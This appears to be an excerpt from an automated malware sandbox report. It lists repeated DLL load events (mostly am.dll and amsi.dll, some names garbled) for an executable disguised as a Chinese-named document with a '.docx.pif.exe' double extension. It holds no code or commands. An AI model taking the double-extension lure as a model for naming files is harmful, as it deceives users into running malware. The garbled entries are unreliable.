Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior

